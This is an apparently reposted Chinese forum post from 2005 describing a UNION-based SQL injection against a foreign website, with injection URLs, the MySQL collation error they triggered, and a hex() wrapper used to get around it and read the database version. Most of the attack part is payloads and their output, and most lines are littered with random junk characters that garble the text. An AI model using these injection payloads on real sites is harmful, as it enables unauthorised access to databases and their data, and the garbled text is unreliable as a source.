本文作者:SuperHei
; T: _$ w/ U/ v8 e文章性质:原创8 j$ B( L# n& m% ^* l1 u/ ]
发布日期:2005-10-184 C! t( M2 d: \ l# g# ?5 F
测试个国外的站时:
$ U% ?" X' \* c5 |& durl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*1 b' U. m0 b: J6 a$ b) d/ d
返回错误:7 D" A& |$ b$ Y
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'( a- N9 {4 F9 H) W0 {+ ^
MySQL Error No. 126
3 K2 e0 q( c: g6 H j4 ]0 }看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
; f# \/ @7 k0 U/ u0 {. E解决办法:转为其他编码如hex。
) ?7 Q: f- T- Z( Y$ z/ c7 s+ wurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/** l8 W, O5 N$ I. \: H+ R9 _- E7 P% @
成功得到hex(version())的值为:
, Z5 ~; U+ u2 v# J342E312E332D62657461, _7 P2 n3 S* g. L) o& D2 e
回Mysql查询下得到:
/ r B1 w8 L" _' x5 z- Y7 S" ^mysql> select 0x342E312E332D62657461;- F5 _ E! T, n+ C5 L
+------------------------+
- {! W. B* X7 J% |: r( h. n3 H| 0x342E312E332D62657461 |+ m% d* M4 ]0 {
+------------------------++ L% M4 `% U+ [' _7 I
| 4.1.3-beta |
, |7 j& Y( [5 s! M; c+------------------------+
. s1 t+ E9 Y, {. G1 row in set (0.00 sec)8 m. T, S6 X0 Z+ E
3 q* \; ^, M- e5 @7 l' b1 h
|
发表于 2012-9-15 14:04:54
收藏
支持
反对